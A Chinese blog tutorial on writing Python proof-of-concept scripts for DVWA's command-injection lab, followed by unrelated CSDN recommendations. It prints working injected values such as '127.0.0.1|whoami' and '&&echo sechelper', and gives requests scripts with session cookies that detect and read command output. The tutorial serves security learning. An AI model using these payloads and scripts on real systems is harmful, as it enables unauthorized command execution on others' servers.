POC 编写练习

已于 2023-11-26 17:08:45 修改
阅读量94 收藏
点赞数
文章标签: python
于 2023-11-25 12:08:29 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41672971/article/details/134612802
版权

简单练习,DVWA靶场开始

首先分析数据包部分

完整的数据包

POST /DVWA-master/vulnerabilities/exec/ HTTP/1.1
Host: 192.168.52.166:81
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 35
Origin: http://192.168.52.166:81
Connection: keep-alive
Referer: http://192.168.52.166:81/DVWA-master/vulnerabilities/exec/
Cookie: PHPSESSID=4vc9olk96pl29lune41krov6n5; security=low
Upgrade-Insecure-Requests: 1

POST数据

ip=127.0.0.1|whoami
Submit=Submit

正常的请求脚本

import requests

URL = "http://192.168.52.166:81/DVWA-master/vulnerabilities/exec/"
data = {"ip":"127.0.0.1|whoami",
        "Submit":"Submit"}
response = requests.post(URL,data,allow_redirects=False)
print("状态{}".format(response.status_code))
print("302跳转地址{}".format(response.next.url))

脚本中需要有的东西

目标,post数据,

写入request中,然后输出response信息

不得不提之前面试官问过我写poc脚本需要用到什么库,服了。

由于没有加入用户验证信息,所以被跳转到登陆页面

接下来加入请求的cookie

Cookie: PHPSESSID=4vc9olk96pl29lune41krov6n5; security=low
import requests

URL = "http://192.168.52.166:81/DVWA-master/vulnerabilities/exec/"
data = {"ip":"127.0.0.1|whoami",
        "Submit":"Submit"}
header = {"cookie":"PHPSESSID=4vc9olk96pl29lune41krov6n5; security=low"}
response = requests.post(URL,data,allow_redirects=False,headers=header)
print("状态{}".format(response.status_code))
if(response.status_code == 302):
 print("302跳转地址{}".format(response.next.url))

如果想输出内容

print("text{}".format(response.text))

根据上述总结了写poc的需要
写出快速检测漏洞脚本

检测原理:如果回显的内容中有自定义的字符,证明有问题

import requests

URL = "http://192.168.52.166:81/DVWA-master/vulnerabilities/exec/"
data = {"ip":"127.0.0.1|echo wangxinyu",
        "Submit":"Submit"}
header = {"cookie":"PHPSESSID=4vc9olk96pl29lune41krov6n5; security=low"}
response = requests.post(URL,data,allow_redirects=False,headers=header)
print("状态{}".format(response.status_code))
print("text{}".format(response.text))
if response.status_code == 200 and response.text.find("wangxinyu") != -1:
    print("[*] {} is weak".format(URL))
else:
    print("[x] {} is safe".format(URL))
if(response.status_code == 302):
 print("302跳转地址{}".format(response.next.url))
if response.status_code == 200 and response.text.find("wangxinyu") != -1:

脚本意思如果在回显内容中找到wangxinyu,则证明有问题

输出特定位置特定信息

# coding=utf-8

import requests

url = "http://192.168.17.5/vulnerabilities/exec/"
# Cookie: PHPSESSID=07ffg4rcbufo5gekqch8v86226; security=low
headers = {"cookie": "PHPSESSID=3eabqr5lprmsir8n0211bolpn1; security=low"}
data = {"ip": "192.168.111.129&&echo sechelper", "Submit":    "Submit"}

# 禁止跳转 allow_redirects = False
response = requests.post(url, data, allow_redirects=False, headers=headers, timeout=5)

if response.status_code == 200:
    from bs4 import BeautifulSoup
    soup = BeautifulSoup(response.text, 'lxml')

    # 在html找到第一个pre标签并返回,取出内容就是命令执行的结果
    pre = soup.find("pre")
    print("[*] response {}".format(pre.text))
print("Detection completed...")

使用爬虫库去搜索pre内容

 from bs4 import BeautifulSoup
    soup = BeautifulSoup(response.text, "html.parser")

    # 在html找到第一个pre标签并返回,取出内容就是命令执行的结果
    pre = soup.find("pre")
    print("[*] response {}".format(pre.text))

pre为输出内容的标签

输出结果

总结:写poc

先登录进去

登录需要目标,post数据,cookie写入header

再找要显示的东西

找标签,正则匹配页面漏洞

漏洞检测思路:

有回显的情况使用匹配函数find去查找回显内容,查找自定义的字符

无回显的情况下一篇文章介绍

bboywxy8340
关注
PocList:python或go编写poc
04-04
标题 "PocList:python或go编写poc" 暗示了这是一个与网络安全相关的项目,其中包含用Python或Go编程语言编写的Proof of Concept(PoC)代码。Proof of Concept,通常简称PoC,是指一段能证明某个概念、漏洞或攻击...
codeblockz:我的练习代码和 POC
06-16
在IT行业中,"codeblockz:我的练习代码和 POC" 这个标题以及描述暗示了一个程序员或安全研究员的工作过程,他们使用JavaScript编程语言进行学习和实践,并且可能涉及到漏洞验证(Proof of Concept, POC)。POC通常是...
Hamza-poc
02-20
在网络安全领域,PoC通常是指为了证明某个安全漏洞存在而编写的简单程序或脚本。这里的"Hamza-poc"可能是作者或者项目的名字,暗示这个PoC是针对特定漏洞或攻击方式的。 描述中同样只提到了“Hamza-poc”,没有提供...
samples:算法,面试任务,POC
04-18
POC”(Proof of Concept)通常是指为了验证某个理论、想法或技术可行性而编写的简单代码。在Java中,POC可能是为了演示一个新功能、安全漏洞利用或软件架构的概念。它不求完善,但能证明概念的实用性和可行性。 ...
xixixiweb培训4大作业.rar
09-09
【标题】"xixixiweb培训4大作业.rar" ...学员将通过编写和运行POC脚本来学习如何发现和利用Web应用的漏洞,并了解如何构建有效的漏洞利用工具。此外,文档和总结提供了理论知识和学习进度的记录,帮助学员巩固所学。
VeighNa:强大的Python开源量化交易平台
Unity打怪升级
09-26 710
VeighNa(简称 VN 或 vn.py)是一个基于 Python 的开源量化交易平台,专为量化交易爱好者和专业交易员设计。VeighNa 是由国内开发者社区推动的开源项目,旨在提供一个功能丰富、灵活且易于扩展的量化交易解决方案。该框架不仅支持多种资产类别的交易,如股票、期货、期权、加密货币等,还支持多种交易接口和协议,使得用户能够轻松进行多市场、多品种的交易策略开发和部署。
第二百五十四节 JPA教程 - JPA 多对多映射示例
2301_78772942的博客
09-27 708
第二百五十四节 JPA教程 - JPA 多对多映射示例
python中的深浅拷贝以及总体框架了解
AgostoDu的博客
09-26 1181
1、当b使用copy.deepcopy()深拷贝的时候,可以理解为b不仅外面的整体开辟了一个新的内存地址,b里面包含的列表也开辟了新的内存地址和a里面的内存地址没有任何关系,所以当a修改里面列表元素的值时不会影响b里面列表元素的值。print(mr) #{'name': 'lis', 'age': 18, 'scroe': 100}<br>备注:已经存在的值的优先级>默认值<br>6.3 直接修改 值,显示最新修改值 (修改默认值优先级小于直接添加的字典值)<br>
Python精选200Tips:171-175
AnFany
09-26 1333
Python深度学习的项目
酷炫音乐盒: 使用Python和Tkinter配合Pygame打造自己的音乐播放器
宇宙第一小趴菜的博客
09-29 1164
Tkinter是一个功能强大且简单易用的库,适合构建轻量级的GUI应用程序。它在不同的操作系统上具有相同的外观和行为,因此可以实现跨平台的应用程序。当然,Tkinter还有更多的功能和细节,通过阅读官方文档和教程,你可以更深入地了解和学习如何运用Tkinter来创建各种GUI应用程序。
Python | Leetcode Python题解之第448题找到所有数组中消失的数字
最新发布
Mopes__的博客
10-01 271
Python | Leetcode Python题解之第448题找到所有数组中消失的数字
合并两个有序数组
Sudo_Wang的学习记录
09-30 405
我们可以使用双指针法从后向前遍历,避免将已经排序的数组打乱。这个方法的核心思路是从。的末尾开始填充较大的元素,因为末尾是用零填充的空闲区域,这样我们可以避免覆盖。这个方法能够高效地解决问题,并且符合进阶要求的 O(m + n) 复杂度。
Python/大数据/机器识别毕业设计选题题目推荐
初尘屿风的博客
09-27 1004
基于Python和Diango在线购物商城系统+报告文档+指导搭建视频基于深度学习的人脸识别与管理系统,Python实现基于Python/机器学习链家网新房数据可视化及预测系统Python豆瓣电影情感分析推荐系统+爬虫+可视化,过滤算法基于python的django框架生鲜商城管理系统设计与实现基于Python的Flask微博话题舆情分析可视化系统设计基于Python豆瓣电影数据可视化分析系统+毕业论文+指导搭建视频基于Python天气预报数据可视化分析系统+毕业论文基于Python的深度学习音乐推荐系统+
numpy is not available
xfsong2012的博客
09-27 422
在测试第一个程序的时候,出现Numpy is not available的错误,根据。安装的时候,安装的是最新版的numpy,检查numpy的版本为2.1.1版。我的pytorch版本为1.12.1,选择不高于1.21的版本即可。的办法知道是因为numpy与pytorch版本不一致造成的。2、安装需要的numpy版本,比如1.21版。
python 实现linear discriminant analysis线性判别分析算法
luthane的博客
09-26 534
线性判别分析(Linear Discriminant Analysis,简称LDA)是一种用于降维和分类的监督学习算法。它通过最大化类间散度和最小化类内散度来找到最佳投影方向,使得不同类别的数据在新的空间中尽可能分开,同一类别的数据尽可能靠近。LDA的基本思想LDA的基本思想是将多维数据映射到低维空间,同时保留数据之间的类别差异。具体来说,LDA通过计算类内散度矩阵(描述同一类别内部数据的分布情况)和类间散度矩阵(描述不同类别之间的差异),然后求解这两个矩阵的广义特征值问题,找到最佳的投影方向。
yjs10——pandas的基础操作
元气少女硕硕子的博客
09-30 335
data = pd.机器学习datasalary")注意:1.是pd.read_cvs,不要顺手写成np.read_cvs2.路径的斜杠方向是/,不是\,如果直接从电脑粘贴路径,路径写法是\,要自己换成/
训练常用API函数及方法
weixin_51277037的博客
09-28 221
self.folder_path = folder_path # 图像文件夹路径self.transform = transform # 可选的转换self.image_files = os.listdir(folder_path) # 获取文件夹中所有文件return len(self.image_files) # 返回图像数量img_name = os.path.join(self.folder_path, self.image_files[idx]) # 构建图像路径。
包/环境管理工具pip和conda介绍
qq_27390023的博客
09-25 875
pip更适合于纯 Python 项目,尤其是对包的控制更加灵活。conda更适合处理复杂的多语言项目、依赖性复杂的数据科学项目,并且自带强大的环境管理工具。
patroni高可用测试
喝醉酒的小白
09-25 264
【代码】patroni高可用测试。
poc编写指南pdf
11-07
POC编写指南PDF是一份关于编写POC(Proof of Concept)的指南的电子书,通过PDF格式的形式提供给读者。POC是指概念验证,用于验证一个想法、概念或原理的可行性。编写POC时,可以使用各种技术、工具和方法来展示一个...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值